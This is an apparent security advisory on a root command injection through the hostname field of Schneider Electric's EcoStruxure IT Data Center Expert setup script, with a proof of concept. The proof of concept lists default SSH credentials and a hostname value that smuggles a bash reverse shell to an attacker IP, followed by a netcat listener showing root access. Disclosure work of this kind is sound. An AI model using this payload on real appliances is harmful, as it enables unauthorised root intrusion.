Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution

Vulnerability Description

When performing the configuration of the Data Center Expert (“DCE”) appliance, sufficient input sanitization is not performed on the value provided for the hostname of the appliance. The hostname variable can include a command terminator and subsequent commands, that will be executed with root privileges.

Technical Description

In the .bcsetup script which drives and controls the SSH-based configuration of the appliance, the hostname value accepted from the user is not sufficiently sanitized. The script does check to ensure there is hostname value provided that includes (but not limited to) a valid hostname.

  def checkHostnameFormat(hn):
    result = False
    try:
        hostname_check = re.compile('[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+')
        result = hostname_check.match(hn)
    except:
        result = False
    return result

A hostname value can be provided that passes this check, but that also includes a semi-colon followed by operating system commands. The .bcsetup script runs with root privileges, so the command(s) after the semi-colon are also executed with root privileges. It is likely this happens when the appliance attempts to perform DNS resolution:

  def resolveHostnameToIPAddr(new_hostname):
    global domain

    if ("" != domain):
        result_string = execOSCmd("host " + new_hostname)
        if (-1 == result_string.find("has address " + ipaddr)):
            return False
        else:
            return True

    return False

Mitigation and Remediation Recommendation

Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric’s Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.

Credit

This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc.

Proof of Concept

DCE Appliance:

SSH in to the appliance using apcsetup / apcsetup (default credentials) and you will be placed in a restricted shell that runs a configuration utility. Accept or set the configuration settings until you get the the prompt for setting the hostname. When prompted for the hostname, provide the following value:

xyzzy.domain.com;bash -i >& /dev/tcp/192.168.2.1/18953 0>&1

ATTACKER BOX:

$ nc -v -l -p 18953 -s 192.168.2.1
Listening on 192.168.2.1 18953
Connection received on 192.168.2.90 35780
[root@xyzzy ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@xyzzy ~]#

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy